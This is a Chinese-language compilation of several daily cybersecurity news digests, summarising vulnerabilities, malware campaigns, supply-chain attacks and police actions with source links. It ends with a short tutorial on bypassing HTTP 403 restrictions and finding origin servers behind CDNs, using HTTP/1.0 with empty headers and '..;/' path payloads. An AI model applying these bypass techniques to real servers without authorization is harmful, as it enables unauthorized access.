1、微软MFA漏洞导致全球用户账户安全风险 https://hackread.com/authquake-flaw-mfa-bypass-azure-office-365-accounts/ 安全研究员发现微软多因素认证(MFA)存在“AuthQuake”漏洞，攻击者可利用该漏洞绕过安全措施，未经授权访问用户账户，该漏洞已影响Azure、Office 365等服务的超过4亿用户。攻击者利用登录尝试次数的速率限制以及时间敏感性验证码(TOTP)的3分钟有效期，快速生成新会话，尝试多次验证码组合。测试显示，攻击者在70分钟内即可绕过MFA，成功率高达50%，且无需用户交互或触发警报。微软在2024年7月发布临时修复补丁，并于10月9日通过 2、软件公司Ivanti修复CSA解决方案中的关键漏洞 https://securityaffairs.com/171850/breaking-news/ivanti-maximum-severity-flaw-csa-solution.html 软件公司Ivanti发布了最新版本CSA 5.0.3，以修复其Cloud Services Appliance(CSA)解决方案中的多个严重漏洞。包括CVSS评分为10的认证绕过漏洞CVE-2024-11639，该漏洞允许远程未认证攻击者获得管理员权限。此外，还修复了两个SQL注入漏洞(CVE-2024-11772和CVE-2024-11773)，这两个漏洞可被远程认证攻击者利用执行任意SQL语句。Iv 3、网络犯罪市场Rydox在国际执法行动中被查封 https://cyberscoop.com/rydox-cybercriminal-marketplace-seized-doj-albania-kosovo/ 美国司法部宣布，在一项国际执法行动中成功打击了一个提供盗窃个人信息和网络犯罪市场Rydox，三名Rydox网站管理员被捕。Rydox自2016年起运营，涉及超过7600笔非法交易，累积收入超过23万美元，主要通过出售信用卡信息、登录凭证以及其他个人身份信息(PII)牟利，涉及数千名美国居民。该网站已向18000多名用户销售了超过321000个网络犯罪产品。此次国际执法行动由FBI匹兹堡办公室、阿尔巴尼亚特别反腐败机构(SPAK)及 4、超过30万个Prometheus监控服务器暴露于DoS攻击风险 https://www.aquasec.com/blog/300000-prometheus-servers-and-exporters-exposed-to-dos-attacks/ 安全研究员揭示了Prometheus生态系统的多个安全漏洞，包括信息泄露、拒绝服务(DoS)和远程代码执行等风险。研究发现，超过33.6万个Prometheus服务器和导出器暴露在互联网上，其中许多未启用认证，易被攻击者利用来获取敏感信息，如凭据和API密钥。此外，暴露的pprof调试端点可能导致服务器过载和崩溃。Prometheus是一款开源监控工具，常被用于动态环境如Kubernetes。其核心功能包括定 5、ZLoader恶意软件通过DNS隧道隐蔽C2通信 https://thehackernews.com/2024/12/zloader-malware-returns-with-dns.html 安全研究员发现了新的ZLoader恶意软件变种，该变种通过域名系统(DNS)隧道进行命令和控制(C2)通信，提升了对检测与缓解的抗衡能力。ZLoader是一种加载器型恶意软件，可部署下一阶段的payload，并支持交互式Shell功能来执行恶意操作。其抗分析技术，如环境检查和API导入解析算法，继续进化以躲避沙箱和静态签名检测。此外，该恶意软件与Black Basta勒索软件攻击密切相关，利用远程桌面连接来分发恶意软件。企业需加强对网络和终端设备的安 6、iOS和macOS中的Symlink漏洞可绕过TCC访问敏感数据 https://thehackernews.com/2024/12/phone-phishing-gang-busted-eight.html 安全研究员发现iOS和macOS中的一个已修复的Symlink漏洞，影响到透明、同意和控制(TCC)框架的安全性。该漏洞允许恶意应用通过欺骗文件操作来访问敏感数据，如健康数据、相机和麦克风等。这种漏洞可在用户毫无察觉的情况下进行数据窃取，严重威胁用户隐私和数据安全。苹果公司已经通过iOS 18、iPadOS 18和macOS Sequoia 15的更新修复了此漏洞，同时修复了WebKit和Safari中的其他安全问题。建议用户及时更新设备系统，并加强 7、新的IOCONTROL恶意软件被用于关键基础设施攻击 https://www.bleepingcomputer.com/news/security/new-iocontrol-malware-used-in-critical-infrastructure-attacks/ 伊朗威胁行为者正在利用一种名为IOCONTROL的新恶意软件，用以破坏以色列和美国关键基础设施使用的物联网(IoT)设备和操作技术/监控与数据采集系统(OT/SCADA)。 8、大众和斯柯达曝12个组合漏洞，攻击者可在10米内无接触入侵 https://cybersecuritynews.com/vulnerabilities-skoda-volkswagen-cars/ 网络安全研究人员发现斯柯达和大众汽车的某些车型的车载娱乐系统中存在多个漏洞，这些漏洞可能让黑客远程跟踪并访问用户的敏感数据。 9、国家发展改革委颁布《电力监控系统安全防护规定》 https://www.ndrc.gov.cn/xxgk/jd/jd/202412/t20241212_1394979.html 本次修订对原《规定》做了多方的修改，并新增13条，修订后共六章37条。 10、Cleo 修补了在数据盗窃攻击中被利用的关键零日漏洞 https://www.bleepingcomputer.com/news/security/cleo-patches-critical-zero-day-exploited-in-data-theft-attacks/ Cleo 发布了针对其 LexiCom、VLTransfer 和 Harmony 软件中零日漏洞的安全更新，该漏洞目前正在数据盗窃攻击中被利用。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、攻击者发动全球性的网络钓鱼攻击 https://hackread.com/ongoing-phishing-campaign-targets-employees/ 安全研究人员发现了一场针对全球12大行业的持续性钓鱼攻击，涉及30多家公司及其员工。这次攻击已分发超过200个恶意链接，目标是窃取用户登录凭据。攻击者采用可信域名、动态公司品牌伪装以及文档平台模仿等手段，绕过检测并诱骗用户上当。窃取的凭据会通过C2服务器或Telegram机器人实时传送给攻击者。其中受影响的行业包括能源、时尚、金融、航空航天、制造业、电信及政府部门等。安全专家建议各行各业都应当：实施多因素身份认证(MFA)，定期加强对员工的网络安全意识培训，使用 2、俄威胁组织Turla利用网络犯罪工具持续攻击乌克兰 https://cyberscoop.com/turla-leverage-cybercriminal-tools-target-ukraine-microsoft/ 俄罗斯国家级威胁组织Turla(也称Secret Blizzard)近期通过利用其他网络犯罪团伙的工具，对乌克兰目标展开攻击。2024年3月至4月期间，该组织使用与犯罪团伙Storm-1919相关联的Amadey僵尸网络恶意软件，针对乌克兰军事设备展开间谍活动。Turla还采用多种混合间谍技术，包括网络钓鱼、战略网站妥协和中间人攻击，扩大攻击范围至全球政府部门和军事机构。安全研究报告表明，Turla利用第三方访问权限入侵关键网 3、年轻人开始给眼珠子拍照，警惕“虹膜写真”泄露隐私 https://baijiahao.baidu.com/s?id=1818216520536855842 有专家在接受媒体采访时提醒，虹膜和人的指纹一样，其纹理特征包含着很多独一无二的个人信息。尽管虹膜写真和虹膜生物认证在硬件、软件和技术原理上并不完全相同，但不排除有别有用心的不法分子可能利用虹膜的写真照片，结合相关技术手段对虹膜生物认证系统进行破解，因此其建议对于拍摄的虹膜写真，尽可能不要在公共场合展示。 4、欧洲刑警组织关闭了27家DDoS攻击平台供应商，管理员被捕 https://cybersecuritynews.com/27-ddos-attack-platforms-seized-dismantled/ 作为由欧洲刑警组织协调的国际行动 PowerOFF 的一部分，当局已经查获了 27 个用于实施这些攻击的最受欢迎的平台。这些平台被称为“booter”和“stresser”网站，使网络犯罪分子和黑客能够用非法流量淹没目标，使网站和其他基于 Web 的服务无法访问。 5、研究人员在一小时内破解了微软Azure的多因素验证 https://www.darkreading.com/cyberattacks-data-breaches/researchers-crack-microsoft-azure-mfa-hour 由于存在一个关键漏洞，研究人员在大约一个小时内就破解了微软 Azure 的多因素身份验证（MFA）方法，该漏洞允许他们在未经授权的情况下访问用户的账户，包括 Outlook 电子邮件、OneDrive 文件、Teams 聊天记录、Azure 云等。 6、新的恶意软件技术利用 Windows UI 框架来逃避 EDR https://thehackernews.com/2024/12/new-malware-technique-could-exploit.html 一种新开发的技术利用名为 UI 自动化 （UIA） 的 Windows 辅助功能框架来执行各种恶意活动，而不会泄露端点检测和响应 （EDR） 解决方案。 7、Splunk 安全网关应用程序存在远程代码执行漏洞 https://www.anquanke.com/post/id/302669 在 Splunk Secure Gateway 应用程序中发现了一个严重漏洞，该漏洞可允许低权限用户在易受攻击的系统上执行任意代码。该漏洞被识别为 CVE-2024-53247，CVSS 得分为 8.8，影响 Splunk Enterprise 9.3.2、9.2.4 和 9.1.7 以下版本，以及 Splunk Cloud Platform 上 Splunk Secure Gateway 应用程序 3.2.461 和 3.7.13 以下版本。 8、恶意 npm 软件包模仿 ESLint 插件，窃取敏感数据 https://www.anquanke.com/post/id/302654 Socket 研究团队最近的一份报告揭露了针对使用流行的 @typescript-eslint/eslint-plugin 的开发人员的复杂错别字抢注攻击。合法的 @typescript-eslint/eslint-plugin 是 TypeScript 开发的基石，每周下载量超过 300 万次，在 CI/CD 管道中得到广泛采用。攻击者于 2023 年 11 月 17 日发布了一个名为 @typescript_eslinter/eslint 的恶意软件包。攻击者于 2023 年 11 月 17 日发布了恶意软件 9、工信部发布关于防范Zabbix软件SQL注入超危漏洞的风险提示 https://www.secrss.com/articles/73446 近日，工业和信息化部网络安全威胁和漏洞信息共享平台（NVDB）监测发现，开源软件Zabbix存在SQL注入超危漏洞。 10、国内最大IT社区CSDN被挂马，疑似CDN 厂商被污染导致 https://www.secrss.com/articles/73427 近日研究员观察到某恶意域名的访问量从9月初陡增，10月底开始爆发，并观察到恶意的payload ，基于相关日志确认CSDN被挂马。测绘数据显示国内大量网站正文页面中包含该恶意域名，包含政府、互联网、媒体等网站，推测 CDN 厂商疑似被污染。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、黑客利用假求职邮件传播AppLite木马攻击安卓用户 https://hackread.com/hackers-job-seekers-banking-trojan-fake-job-emails/ 黑客通过伪装成知名公司HR团队的假求职邮件，传播新型AppLite银行木马，专门针对安卓设备窃取银行凭证、加密钱包和其他敏感数据。攻击者利用钓鱼邮件，引导受害者访问伪装成求职网站的恶意页面，并诱使其下载携带恶意软件的应用程序。该木马具备拦截短信、记录键盘输入、截屏以及绕过双因素认证的功能，同时通过代码混淆和动态行为规避安全检测，并频繁更新命令与控制(C2)服务器以隐匿活动。安全研究人员将其归类为Antidot木马的新变种，指出其利用求职者的疏忽进行 2、Dell紧急修复Power Manager的高危漏洞 https://hackread.com/dell-urges-update-critical-power-manager-vulnerability/ Dell Power Manager软件被发现存在高危访问控制漏洞(CVE-2024-49600)，该漏洞允许本地攻击者绕过安全措施、执行任意代码，并提升权限。受影响版本包括3.17之前的所有版本。漏洞可能导致系统机密性、完整性和可用性遭到破坏，包括恶意软件植入、数据泄露或系统妥协。Dell已发布Power Manager 3.17版本修复该漏洞，并强烈建议用户立即更新，以免受到攻击威胁。经安全研究员分析发现此漏洞目前无可用变通方案。此外， 3、微软一次性修复超70个安全漏洞 https://www.securityweek.com/microsoft-ships-urgent-patch-for-exploited-windows-clfs-zero-day/ 2024年12月11日，微软发布了一次重要的安全更新，修复了70多个已知安全漏洞，其中特别强调了一个正在被利用的Windows通用日志文件系统(CLFS)零日漏洞(CVE-2024-49138)。该漏洞被评为高危(CVSS评分7.8)，已在实际攻击中被利用。微软指出，该漏洞无需用户交互即可被低权限用户利用，通过堆栈缓冲区溢出获得系统级权限，显示出极高的风险。此次补丁还修复了多个关键漏洞，包括Windows 4、心脏手术设备制造商Artivion遭勒索攻击和数据窃取 https://www.theregister.com/2024/12/10/artivion_security_incident/ 2024年11月21日，心脏手术设备制造商Artivion遭遇了一起严重的网络安全事件，疑似为双重勒索类型的勒索软件攻击。攻击者不仅加密了公司的文件，还窃取了部分数据。目前尚未有勒索软件团伙承认此次事件，或双方正在就赎金进行谈判。Artivion在向美国证券交易委员会提交的声明中表示，已采取应急措施，包括下线部分系统、启动调查，并聘请外部专家协助评估、控制和修复该事件。然而，此次攻击仍对公司订单和发货流程以及部分业务运营造成持续性干扰。尽管Artivion预计 5、公安部公布多起打击整治“网络水军”违法犯罪典型案例 https://www.chinacourt.org/article/detail/2024/12/id/8287569.shtml 今年以来，公安部依托“净网2024”专项行动，聚焦造谣引流、舆情敲诈、刷量控评、有偿删帖等突出违法犯罪活动，部署全国公安机关开展打击整治“网络水军”违法犯罪工作，共侦破案件900余起，抓获嫌疑人5000余名。公安部11日公布多起依法打击“网络水军”违法犯罪典型案例。 6、断网近24小时！俄罗斯再次演练“主权互联网”可用性 https://www.secrss.com/articles/73363 上周末，俄罗斯多个地区的居民经历了互联网中断。当地政府试图将这些地区从全球网络中断开，以测试该国的“主权互联网”基础设施。 7、知名Cleo企业级文件传输产品存在漏洞，正在被黑客利用 https://www.securityweek.com/cleo-file-transfer-tool-vulnerability-exploited-in-wild-against-enterprises/ 网络安全公司 Huntress 在周一警告称，影响企业软件制造商 Cleo 多个文件传输产品的漏洞未正确修补，并在过去至少一周内被利用。Cleo 是一家总部位于伊利诺伊州的公司，为超过 4200 家组织提供供应链和 B2B 集成解决方案。 8、银狐木马团伙再出新招——Web漏洞成切入点 https://www.anquanke.com/post/id/302630 银狐木马是一种针对企事业单位管理人员、财务人员、销售人员及电商卖家进行钓鱼攻击的恶意软件。该家族木马主要通过伪装成与工作相关的文件，如发票、财税文件等，诱骗用户点击下载和执行，从而实现对目标计算机的远程控制。 9、Apple 推送重大 iOS、macOS 安全更新 https://www.securityweek.com/apple-pushes-major-ios-macos-security-updates/ 苹果安全响应团队推出了重大安全更新，以修复 iOS 和 macOS 生态系统中的安全缺陷，并警告数据泄露、沙箱逃逸和代码执行攻击的风险。该公司呼吁立即关注其 iOS 18.2 和 macOS Sequoia 15.2 补丁，警告内核、WebKit、AppleMobileFileIntegrity、密码和 ImageIO 组件中存在缺陷。 10、BadRAM攻击：使用10美元的设备破坏AMD可信执行环境保护 https://www.securityweek.com/badram-attack-uses-10-equipment-to-break-amd-processor-protections/ 学术研究人员设计了 BadRAM，这是一种新的攻击，使用 10 美元的设备来破坏 AMD 最新的可信执行环境保护。这种名为BadRAM 的新攻击使用 10 美元的现成设备来破坏 AMD SEV-SNP（安全加密虚拟化 - 安全嵌套分页），这是一种尖端的内存完整性保护，依靠加密和隔离来防止信息泄漏，并且基于虚拟机管理程序攻击。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、朝鲜黑客窃取Radiant Capital 5000万美元资金 https://www.securityweek.com/radiant-capital-50-million-heist-blamed-on-north-korean-hackers/ Radiant Capital于2023年10月遭遇重大网络攻击，约5000万美元资产被朝鲜关联的黑客组织UNC4736(亦称AppleJeus或Citrine Sleet)窃取。攻击起源于9月，一名开发者通过Telegram收到伪装成前承包商的消息，点击恶意链接后感染恶意软件。黑客利用开发者设备，在多签名调整过程中伪造交易，避过Safe{Wallet}验证，将资金从核心市场抽离。随后，攻击者利用开放授权进 2、OpenWrt路由器具有导致供应链攻击的安全漏洞 https://www.helpnetsecurity.com/2024/12/09/openwrt-security-update-supply-chain-attack/ OpenWrt是一种可定制的操作系统，主要用于各种制造商的无线家用路由器。安全研究员在OpenWrt的Attendedsysupgrade Server(ASU)中发现了两处安全漏洞。ASU是为基于OpenWrt发行版提供按需生成固件镜像服务的服务器，支持用户根据设备和所需软件包生成新固件。漏洞包括：命令注入漏洞，攻击者可能在固件构建过程中注入恶意命令，从而生成签署有合法构建密钥的恶意固件。SHA-256哈希碰撞问题( 3、ShinyHunters和Nemesis利用AWS S3漏洞窃取2TB敏感数据 https://hackread.com/shinyhunters-nemesis-hacks-aws-s3-bucket-leak/ 网络安全研究人员揭示了一场由ShinyHunters和Nemesis攻击组织关联的大规模网络攻击。攻击者通过利用数百万个网站的漏洞，窃取了超过2TB的敏感数据，包括客户信息、基础设施凭证和专有源代码。黑客采用Python、PHP等脚本语言以及ffuf、httpx和Shodan等工具，扫描AWS IP地址和域名，扩展攻击范围。由于配置不当，攻击者还通过开放的AWS S3存储桶暴露了其部分操作细节。研究人员与AWS欺诈团队合作通知受影响用户，并采取缓解措施，同时 4、黑客通过操纵AI干扰健康应用的准确性 https://www.govinfosecurity.com/interviews/how-hackers-manipulate-ai-to-affect-health-app-accuracy-i-5427 安全研究员发现，黑客可通过AI操纵健康应用的数据，威胁用户健康和数据完整性。研究者开发的恶意软件从Google Health Connect提取数据并发送至AI应用，由AI生成虚假信息，如错误的血糖读数，从而误导健康应用建议错误的治疗方案。这种操控可能导致医生难以质疑患者日常使用的设备数据，增加医疗决策风险。尽管此研究针对Google Health Connect，但这种利用AI操纵 5、FBI建议用暗号戳穿语音克隆骗局 https://www.secrss.com/articles/73303 近日，美国联邦调查局（FBI）发布了一项重要建议：与家人设置一个专属“暗号”或“暗语”，以应对日益猖獗的AI语音克隆骗局。随着越来越多的犯罪分子利用生成式AI技术模仿亲友声音实施诈骗，FBI提醒民众，这种简单的防护措施可以有效识别骗局，保护财产安全。 6、DeepSeek 和 Claude AI 存在命令注入漏洞 https://www.freebuf.com/news/417305.html DeepSeek 人工智能聊天机器人中的一个现已修补的安全漏洞的详细信息，如果成功利用，黑客可通过输入注入攻击方式控制受害者的账户。 7、罗马尼亚在涉嫌俄罗斯干预TikTok后取消总统选举结果 https://thehackernews.com/2024/12/romania-cancels-presidential-election.html 因为有人指控俄罗斯干预，罗马尼亚宪法法院在一项历史性裁决中宣布总统选举第一轮投票结果无效 。 8、DaMAgeCard：一种新的攻击利用 SD 卡来破坏系统内存 https://cybersecuritynews.com/damagecard-attack/ 一种被称为“DaMAgeCard”的新型攻击利用 SD Express 标准，通过其 SD 读卡器直接访问设备的内存。这种方法绕过了传统的安全措施，允许攻击者提取敏感数据或注入恶意代码，而无需物理访问设备内部。 9、第三方公司0Patch修复了Windows NTLM 哈希零日漏洞 https://www.ithome.com/0/816/232.htm 第三方安全公司 0Patch 发布了针对 Windows 系统中的一个零日 NTLM 哈希漏洞的修复补丁，该漏洞允许攻击者仅通过被攻击者查看文件资源管理器中的恶意文件所在的文件夹即可劫持凭据，无需实际打开文件。 10、黑客利用 ProjectSend 漏洞对暴露的服务器进行后门处理 https://www.4hou.com/posts/pnBX 尽管该漏洞已于 2023 年 5 月 16 日得到修复，但直到近期才为其分配了 CVE，导致用户没有意识到其严重性以及应用安全更新的紧迫性。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

↓ ↓ ↓  12.12 直播间惊喜福利即将开启！ ↓ ↓ ↓

1、RedLine窃密木马通过盗版企业软件攻击俄罗斯企业 https://securelist.ru/redline-stealer-in-activators-for-business-software/111241/ 自2024年1月起，RedLine信息窃取活动持续针对俄罗斯企业，利用盗版的企业业务自动化软件进行传播。攻击者在会计和商业论坛发布伪装为HPDxLIB激活器的恶意版本，该版本使用.NET开发并携带自签名证书，而合法版本则使用C++开发并具有有效签名。根据卡巴斯基的报告，攻击者通过层层加密和.NET Reactor工具对恶意代码进行混淆，同时提供详细说明指导用户禁用安全软件以运行激活器。被感染的用户在执行替换了恶意库的补丁程序后，合 2、Python包“aiocpa”被揭露为加密货币窃取工具 https://hackread.com/aiocpa-python-package-cryptocurrency-infostealer/ ReversingLabs（RL）的机器学习威胁狩猎系统近日发现，PyPI中的合法外观Python包“aiocpa”被用于窃取加密货币钱包。该包伪装为同步和异步的加密支付API客户端，已被下载超过12100次。攻击者通过发布多个版本建立信任，并在版本0.1.13及之后的更新中植入恶意代码。此代码通过多层加密隐藏，旨在窃取加密交易令牌，可用于转移受害者的钱包资金。攻击者甚至试图接管已有的PyPI项目“pay”，以扩展受害者范围。传统应用安全测试工具未能检 3、数百款Cisco交换机受引导加载程序漏洞影响 https://securityaffairs.com/171729/security/cisco-switches-bootloader-flaw-cve-2024-20397.html Cisco NX-OS软件的启动加载器存在一个漏洞（CVE-2024-20397，CVSS评分：5.2），影响超过100款交换机设备。此漏洞允许攻击者绕过镜像签名验证，加载未经验证的软件。根据Cisco的安全公告，攻击者可以通过物理访问设备或使用本地管理员凭据，执行一系列启动加载器命令以触发漏洞。这一问题源于启动加载器配置的不安全设置，可能导致系统运行未经验证的NX-OS镜像，从而威胁设备的完整性。目前， 4、研究人员发现可利用QR码实现隔离浏览器环境下的C2通信 https://cloud.google.com/blog/topics/threat-intelligence/c2-browser-isolation-environments/ SpecterOps团队早前发布了一篇关于绕过浏览器隔离环境的技术博客，而Mandiant的红队更进一步，提出了利用QR码完成命令与控制（C2）通信的新方法。在浏览器隔离环境中，传统的HTTP响应无法直接被本地浏览器解码，因为用户仅能接收到像素流，而非实际的HTTP数据响应。Mandiant的方案创新性地通过QR码传递命令数据。具体过程如下：恶意植入程序使用无头浏览器（如Puppeteer）向C2服务器请求页面 5、最强Android间谍软件曝光，可提取信息、密码和执行shell命令 https://www.bleepingcomputer.com/news/security/new-android-spyware-found-on-phone-seized-by-russian-fsb/ 该恶意软件似乎是Monokle的新版本， Monokle最初由Lookout在2019年发现，由总部位于圣彼得堡的特种技术中心有限公司开发。 6、警方捣毁非法加密通信服务Matrix：全球网络犯罪遭重创 https://mp.weixin.qq.com/s/ba3o7T_oNsx6_geqDGuubQ 欧盟刑警组织近日宣布，在一项代号为“Passionflower”的国际联合行动中，法国和荷兰警方成功捣毁了一个名为Matrix的非法加密通信服务。 7、普通用户手机上发现间谍软件 Pegasus https://cybernews.com/security/pegasus-spyware-detected-on-ordinary-peoples-phones/ 移动安全公司 iVerify 在今年 5 月发布了一个工具，可用于扫描手机是否感染了以色列公司 NSO Group 开发的间谍软件 Pegasus。2500 名用户扫描设备后发现了 7 起 Pegasus 感染事件。这意味着 Pegasus 的传播范围比以前认为的更为广泛。 8、微软将 Azure 防火墙与标准负载均衡器集成以提高安全性 https://cybersecuritynews.com/azure-firewall-integrated-with-azure-standard-load-balancer/ 微软推出了 Azure 防火墙和 Azure 标准负载均衡器之间的新集成功能，使用户能够创建更强大、更安全的网络体系结构。 9、Ultralytics AI 模型被劫持，用加密挖矿程序感染数千人 https://www.bleepingcomputer.com/news/security/ultralytics-ai-model-hijacked-to-infect-thousands-with-cryptominer/ 流行的 Ultralytics YOLO11 AI 模型在供应链攻击中遭到破坏，在运行 Python 包索引 （PyPI） 版本 8.3.41 和 8.3.42 的设备上部署加密挖矿程序 。 10、Akamai等WAF中的一个漏洞影响了40%的财富 100 强公司 https://cybersecuritynews.com/waf-vulnerability-in-akamai-cloudflare-and-imperva/ 领先的网络安全研究团队 Zafran 表示，最近在 Web 应用程序防火墙 （WAF） 服务配置中发现了一个被称为“BreakingWAF”的安全漏洞，该漏洞使许多财富 1000 强公司容易受到网络攻击。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Solana的web3.js库被发现遭遇供应链攻击 https://socket.dev/blog/supply-chain-attack-solana-web3-js-library 近期，Solana的web3.js库（版本1.95.6和1.95.7）被发现遭遇供应链攻击，恶意代码被注入其中，旨在窃取开发者和用户的私钥，从而可能导致加密货币钱包资金被盗。这些被感染的版本在npm上的每周下载量超过350000次，广泛应用于Solana生态系统的Web3开发。攻击发生的原因被认为是一次针对web3.js库官方维护者的社交工程/phishing攻击。受影响的版本包括1.95.6和1.95.7，恶意代码会将被窃取的私钥传输到一个硬编码的地址，该地 2、英国国家犯罪局破获俄罗斯跨国洗钱网络 https://www.nationalcrimeagency.gov.uk/news/operation-destabilise-nca-disrupts-multi-billion-russian-money-laundering-networks-with-links-to-drugs-ransomware-and-espionage-resulting-in-84-arrests 近日，英国国家犯罪局（NCA）主导的国际调查行动——“Destabilise行动”成功揭露并破获了多个俄罗斯洗钱网络，这些网络为全球范围内的严重犯罪活动提供了支持。此次行动涉及多个地区，包括英国、中东、俄罗 3、Black Basta勒索软件团伙袭击英国电信集团 https://securityaffairs.com/171668/breaking-news/black-basta-ransomware-attack-bt-group.html BT集团（前身为英国电信公司）宣布，在遭遇Black Basta勒索软件袭击后，公司关闭了部分服务器以进行应急响应。该公司表示，攻击主要针对其BT会议平台（BT Conferencing），且仅影响了平台的特定部分。受影响的服务器已被迅速隔离和下线，且未影响实时的BT会议服务。BT集团是全球领先的电信巨头之一，业务遍及180个国家，提供固定电话、宽带、移动、电视和IT服务等。目前尚不清楚攻击者是否窃取了数据。 4、日本I-O DATA LTE路由器发现零日漏洞 https://jvn.jp/en/jp/JVN46615026/index.html 日本I-O DATA公司近日发布安全通告，警告其UD-LT1和UD-LT1/EX型号的LTE路由器存在多个零日漏洞。攻击者利用这些漏洞可能修改设备设置、执行命令，甚至关闭防火墙。漏洞包括权限配置不当、远程操作系统命令执行和绕过身份验证关闭防火墙等问题。I-O DATA确认有客户已报告遭遇外部未经授权的访问。该公司表示，将于2024年12月18日发布修复补丁，但在此之前，用户应采取防护措施：禁用远程管理功能、限制仅通过VPN网络访问、修改默认“访客”账户密码、定期检查设备设置并及时恢复出厂设置。该系列路由器 5、Mitel MiCollab协作平台中存在多个安全漏洞 https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/ 在当前攻击目标趋于广泛化的背景下，任何位于企业DMZ中的设备都成为潜在攻击目标，而Mitel MiCollab平台的最新漏洞揭示了VoIP系统的严重安全隐患。研究人员发现了两个已公开的漏洞（CVE-2024-35286和CVE-2024-41713），以及一个尚未修复的零日漏洞，暴露了MiCollab平台在身份验证绕过和任意文件读取等方面的显著风险。CVE-202 6、Ultralytics YOLO AI模型遭到供应链攻击 https://www.techtarget.com/searchsecurity/news/366616877/Ultralytics-YOLO-AI-model-compromised-in-supply-chain-attack 近日，美国软件公司Ultralytics旗下YOLO11图像识别AI模型被曝遭供应链攻击，版本v8.3.41和v8.3.42中被植入XMRig加密挖矿软件。尽管Ultralytics尚未发布官方安全通告，但已紧急下架受影响的PyPI包，并暂停自动部署以展开调查。此次事件由开发者“metrizable”在GitHub上首次曝光，他通过比对PyPI包与GitHub 7、Termite勒索软件袭击供应链平台Blue Yonder https://cyble.com/blog/technical-look-at-termite-ransomware-blue-yonder/ 供应链管理平台Blue Yonder及其客户近日遭遇了由新型勒索软件“Termite”发起的攻击。研究显示，“Termite”是臭名昭著的Babuk勒索软件的重命名版本。Cyble研究与情报实验室（CRIL）分析了Termite的样本，并指出该勒索软件已经在其泄露网站上列出七个受害者。技术分析表明，Termite在运行后调用SetProcessShutdownParameters(0, 0) API，以确保其进程在系统关机时最晚被终止，从而获得足够 8、研究人员发现泄露NTLM凭据的Windows零日漏洞 https://blog.0patch.com/2024/12/url-file-ntlm-hash-disclosure.html 研究人员发现了一个影响所有Windows系统（从Windows 7到Windows 11 v24H2和Server 2022）的0day漏洞。该漏洞允许攻击者通过用户在Windows资源管理器中查看恶意文件来窃取其NTLM凭据，例如通过访问共享文件夹、USB磁盘，或查看从攻击者网站自动下载至“下载”文件夹的文件。此漏洞已报告给微软，但目前尚未发布官方补丁。研究团队提供了免费的微补丁，直到微软推出官方修复方案为止。微补丁适用于多个Windows版本，包括Wind 9、Bitsight揭示Socks5Systemz代理恶意软件 https://www.bitsight.com/blog/proxyam-powered-socks5systemz-botnet Bitsight TRACE近期发布报告，揭示了一款名为Socks5Systemz的代理恶意软件的演化及其影响。尽管其活跃时间可以追溯到2013年，但Socks5Systemz直到最近才因大规模传播活动引起关注。此恶意软件旨在将受感染设备转化为代理出口节点，曾作为独立产品或集成至Andromeda、Smokeloader和Trickbot等恶意软件中进行分发。最新调查显示，Socks5Systemz的一个僵尸网络在其高峰时拥有多达25万个受感染系统，覆盖几乎所 10、8Base勒索软件组织攻击克罗地亚里耶卡港 https://securityaffairs.com/171779/cyber-crime/8base-ransomware-croatias-port-of-rijeka.html 克罗地亚最大的干货港口特许经营商——里耶卡港（Luka Rijeka d.d.）近日遭到8Base勒索软件组织的攻击。攻击者声称窃取了包括发票、收据、会计文件、个人数据、合同和保密协议在内的大量敏感信息，并在其Tor泄密网站上公布了部分详情。8Base勒索软件组织要求在2024年12月10日前支付赎金，但里耶卡港首席执行官杜什科·格拉博瓦茨（Duško Grabovac）向当地媒体表示，此次事件并未影响港口运 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

一种绕过403的新技术，跟大家分享一下。研究HTTP协议已经有一段时间了。发现HTTP协议的1.0版本可以绕过403。于是开始对lyncdiscover.microsoft.com域做FUZZ，并且发现了几个403Forbidden的文件。 （访问fsip.svc为403） 在经过尝试后，得出一个结论：当清除所有header头的值时，服务器会对客户端作出响应。 结论1： 将HTTP协议版本更改为1.0，而且不要在标题中设置任何值。 结论2： 如果服务器和任何其他安全机制没有以正确的方式配置，不把Host放在header头内时，服务器将会自己把目标地址放在header中，这会导致服务器将我们的请求认做本地请求。 （访问fsip.svc为200） 用同样的方式尝试了另一个文件，并且再次成功bypass。 （403） （200） 还要补充一点：你也可以用同样的方式去绕过CDN获取服务器IP。 例如： 如你所见，在Location中，它在返回中显示了域本身的地址。 再次使用相同的方法并发送请求时，显示了服务器的主地址。 以上技术已经被添加到burp工具当中： https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122------------------------------ 以上这种思路虽然已经被添加到了burp插件，但我们依旧需要去学习了解插件运行背后的逻辑，而不只是当一个脚本小子。 尤其是在做黑盒测试中，秉持改变原有数据结构的FUZZ思路进行一切可能的尝试，才会挖掘出更有趣的漏洞。 在burp权限绕过插件中，除了以上尝试，还有诸多修改url请求的尝试，例如： https://www.example.com..;/api/v1/users https://www.example.com/api..;/v1/users https://www.example.com/api/v1..;/users 